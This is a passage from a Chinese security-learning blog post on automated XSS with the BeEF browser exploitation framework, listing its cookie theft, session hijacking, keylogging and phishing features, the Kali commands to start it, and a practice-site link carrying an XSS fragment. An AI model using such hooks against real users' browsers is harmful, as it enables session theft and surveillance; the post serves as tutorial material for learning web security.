<p><img src="https://ws1.sinaimg.cn/large/007JdRFxgy1g27xa12ws9j30on0i4gm8.jpg" alt=""><br>查看获取到的结果<br><img src="https://ws1.sinaimg.cn/large/007JdRFxgy1g27x74fkn5j31ed0iatwg.jpg" alt=""></p>
<h4 id="自动化XSS"><a href="#自动化XSS" class="headerlink" title="自动化XSS"></a>自动化XSS</h4><h5 id="BeEF简介"><a href="#BeEF简介" class="headerlink" title="BeEF简介"></a>BeEF简介</h5><figure class="highlight armasm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">Browser </span>Exploitation Framework(<span class="keyword">BeEF)</span></span><br><span class="line"><span class="keyword">BeEF是目前最强大的浏览器开源渗透测试框架，通过XSS漏洞配合JS脚本和Metasploit进行渗透；</span></span><br><span class="line"><span class="keyword">BeEF是基于Ruby语言编写的，并且支持图形化界面，操作简单；</span></span><br><span class="line"><span class="keyword">http://beefproject.com</span></span><br><span class="line"><span class="keyword"></span></span><br><span class="line"><span class="keyword">信息收集：</span></span><br><span class="line"><span class="keyword">1、网络发现</span></span><br><span class="line"><span class="keyword">2、主机信息</span></span><br><span class="line"><span class="keyword">3、Cookie获取</span></span><br><span class="line"><span class="keyword">4、会话劫持</span></span><br><span class="line"><span class="keyword">5、键盘记录</span></span><br><span class="line"><span class="keyword">6、插件信息</span></span><br><span class="line"><span class="keyword"></span></span><br><span class="line"><span class="keyword">持久化控制</span></span><br><span class="line"><span class="keyword">1、确认弹框</span></span><br><span class="line"><span class="keyword">2、小窗口</span></span><br><span class="line"><span class="keyword">3、中间人</span></span><br><span class="line"><span class="keyword"></span></span><br><span class="line"><span class="keyword">社会工程：</span></span><br><span class="line"><span class="keyword">1、点击劫持</span></span><br><span class="line"><span class="keyword">2、弹窗告警</span></span><br><span class="line"><span class="keyword">3、虚假页面</span></span><br><span class="line"><span class="keyword">4、钓鱼页面</span></span><br><span class="line"><span class="keyword"></span></span><br><span class="line"><span class="keyword">渗透攻击：</span></span><br><span class="line"><span class="keyword">1、内网渗透</span></span><br><span class="line"><span class="keyword">2、Metasploit</span></span><br><span class="line"><span class="keyword">3、CSRF攻击</span></span><br><span class="line"><span class="keyword">3、DDOS攻击</span></span><br></pre></td></tr></table></figure>
<h5 id="BeEF基础"><a href="#BeEF基础" class="headerlink" title="BeEF基础"></a>BeEF基础</h5><figure class="highlight elixir"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">启动Apache和BeEF</span><br><span class="line">root<span class="variable">@kali</span><span class="symbol">:~</span><span class="comment"># systemctl start apache2</span></span><br><span class="line">root<span class="variable">@kali</span><span class="symbol">:~</span><span class="comment"># beef-xss</span></span><br></pre></td></tr></table></figure>
<p><img src="https://ws1.sinaimg.cn/large/007JdRFxgy1g27zbd24eij30nq0fnqgf.jpg" alt=""><br><img src="https://ws1.sinaimg.cn/large/007JdRFxgy1g27zey0vy6j30or0jg758.jpg" alt=""><br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">植入XSS代码</span><br></pre></td></tr></table></figure></p>
<p><img src="https://ws1.sinaimg.cn/large/007JdRFxgy1g27zha1brej30oh0i575t.jpg" alt=""><br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">用户浏览页面</span><br></pre></td></tr></table></figure></p>
<p><img src="https://ws1.sinaimg.cn/large/007JdRFxgy1g27zlx3bj2j30yy0ht757.jpg" alt=""><br><figure class="highlight ebnf"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="attribute">online browsers</span></span><br></pre></td></tr></table></figure></p>
<p><img src="https://ws1.sinaimg.cn/large/007JdRFxgy1g27zkucilmj30op0entaw.jpg" alt=""></p>
<figure class="highlight less"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">命令<span class="selector-tag">command</span>颜色(Color):</span><br><span class="line">绿色 对目标主机生效并且不可见(不会被发现)</span><br><span class="line">橙色 对目标主机生效但可能可见（可能被发现）</span><br><span class="line">灰色 对目标主机未必生效(可验证下)</span><br><span class="line">红色 对目标主机不生效</span><br></pre></td></tr></table></figure>
<p><img src="https://ws1.sinaimg.cn/large/007JdRFxgy1g27zb4ug6cj30op0k4acq.jpg" alt=""><br><img src="https://ws1.sinaimg.cn/large/007JdRFxgy1g2819kfnfaj30s20f8gn2.jpg" alt=""></p>
<p>BeEF相关文章：<a href="https://www.freebuf.com/articles/web/175755.html" target="_blank" rel="noopener">https://www.freebuf.com/articles/web/175755.html</a> <br><br>XSS练习相关网站：<a href="http://xsst.sinaapp.com/example/1-1.php?page=%3Cimg%20src=x" target="_blank" rel="noopener">http://xsst.sinaapp.com/example/1-1.php?page=%3Cimg%20src=x</a></p>

      
    </div>
    
    
    
		<div>
		  
			<div>
    
        <div style="text-align:center;color: #ccc;font-size:14px;">-本文结束<i class="fa fa-paw"></i>感谢您的阅读-</div>
    
</div>
		  
		</div>
    

    

    

    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/06/19/201945/" rel="next" title="目标信息收集">
                <i class="fa fa-chevron-left"></i> 目标信息收集
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/06/19/201947/" rel="prev" title="AWVS 介绍">
                AWVS 介绍 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
        
  <script>
    window._bd_share_config = {
      "common": {
        "bdText": "",
        "bdMini": "1",
        "bdMiniList": false,
        "bdPic": ""
      },
      "image": {
        "viewList": ["tsina", "douban", "sqq", "qzone", "weixin", "twi", "fbook"],
        "viewText": "分享到：",
        "viewSize": "16"
      },
      "slide": {
        "bdImg": "5",
        "bdPos": "left",
        "bdTop": "100"
      }
    }
  </script>

<script>
  with(document)0[(getElementsByTagName('head')[0]||body).appendChild(createElement('script')).src='/static/api/js/share.js?v=89860593.js?'];
</script>

      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
      <div id="sidebar-dimmer"></div>
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope="" itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image" src="/uploads/avatar.jpg" alt="小维同学">
            
              <p class="site-author-name" itemprop="name">小维同学</p>
              <p class="site-description motion-element" itemprop="description">努力努力再努力</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">49</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">11</span>
                  <span class="site-state-item-name">分类</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">54</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          

          
		  <!-- 网易音乐播放器 -->
			<div id="music163player">
				
			</div>

          
          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-block">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-link"></i>
                友情链接
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="http://ximcx.cn/" title="西门吹雪's Blog" target="_blank">西门吹雪's Blog</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://gcker.github.io" title="Allard博客" target="_blank">Allard博客</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://axiaowei.cn" title="互友链添加微信(ITxiaowei)" target="_blank">互友链添加微信(ITxiaowei)</a>
                  </li>
                
              </ul>
            </div>
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-4"><a class="nav-link" href="#XSS简介"><span class="nav-text">XSS简介</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#原理分析"><span class="nav-text">原理分析</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#构造XSS脚本"><span class="nav-text">构造XSS脚本</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#常用HTML标签"><span class="nav-text">常用HTML标签</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#常用JavaScript方法"><span class="nav-text">常用JavaScript方法</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#构造XSS脚本-1"><span class="nav-text">构造XSS脚本</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#反射型XSS"><span class="nav-text">反射型XSS</span></a><ol class="nav-child"><li class="nav-item nav-level-6"><a class="nav-link" href="#安全级别"><span class="nav-text">安全级别</span></a></li><li class="nav-item nav-level-6"><a class="nav-link" href="#手工XSS"><span class="nav-text">手工XSS</span></a></li></ol></li><li class="nav-item nav-level-5"><a class="nav-link" href="#存储型XSS"><span class="nav-text">存储型XSS</span></a><ol class="nav-child"><li class="nav-item nav-level-6"><a class="nav-link" href="#手工-基础"><span class="nav-text">手工(基础)</span></a></li></ol></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#自动化XSS"><span class="nav-text">自动化XSS</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#BeEF简介"><span class="nav-text">BeEF简介</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#BeEF基础"><span class="nav-text">BeEF基础</span></a></li></ol></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      
        <div class="back-to-top">
          <i class="fa fa-arrow-up"></i>
          
            <span id="scrollpercent"><span>0</span>%</span>
          
        </div>
      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">小维同学</span>

  
</div>






  <div class="theme-info">❤  <a class="theme-link" target="_blank" href="https://axiaowei.cn">LZL</a></div>




        







        
      </div>
    </footer>

    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  











  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  

  
<script>
(function(){
    var bp = document.createElement('script');
    var curProtocol = window.location.protocol.split(':')[0];
    if (curProtocol === 'https') {
        bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';        
    }
    else {
        bp.src = 'http://push.zhanzhang.baidu.com/push.js';
    }
    var s = document.getElementsByTagName("script")[0];
    s.parentNode.insertBefore(bp, s);
})();
</script>


  
  

  

  

  

</body>
</html>
